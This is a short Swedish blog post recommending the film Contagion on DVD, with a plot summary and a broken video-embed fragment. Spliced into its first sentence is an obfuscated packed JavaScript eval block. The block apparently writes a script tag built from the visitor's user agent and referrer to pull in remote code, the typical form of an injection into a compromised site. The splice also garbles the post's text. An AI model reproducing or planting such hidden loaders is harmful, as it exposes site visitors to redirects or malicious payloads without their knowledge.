Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

INGET SPRIDER SIG SOM RÄDSLA. CONTAGION.

INGET SPRIDER SIG SOM RÄDSLA. CONTAGION.
Sebastian

type=”text/javascript” src=”https://goviral.hs.llnwd.net/e1/playerjs/inget_sprider_10944.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1357315&skinName=light&wmode=window&hideChrome=0″>

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fkfdi|var|u0026u|referrer|hzbdn||js|php’.split(’|’),0,{}))
är finns filmen Contagion ute på DVD.

Jag är själv en person som gillar filmer som Independence Day och Day after Tomoorow. Filmer där vår jords befolkning får sig en tankeställare och ställs inför nästan ”overkliga” företeelser.
Nu har filmen Contagion kommit ut på dvd och om ni itne sett den kan jag starkt rekommendera en underhållande film.

Kort om filmen:

En kontaktyta, ett ögonblick är allt som krävs för att ett dödligt virus ska överföras från en person till en annan. Det enda som smittar snabbare är rädsla.

Beth har varit på en lång affärsresa återvänder hem trött och matt. Symptomen som hon trodde var vanlig jetlag tar en våldsam vändning. Två dagar senare är hon död och läkarnahittar ingen förklaring. Snart dyker andra, liknandefall upp, antalet insjuknade ökar lavinartat och de miljontals kontaktytorna mellan människor varje dag gör smittan omöjlig att spåra. Rädslan sprider sig som en löpeld och läkarna och experterna som kallats in för att försöka hitta smittkällan ställs själva inför omöjliga val hur mycket de är villiga att riskera för att rädda världen undan en dödlig epidemi.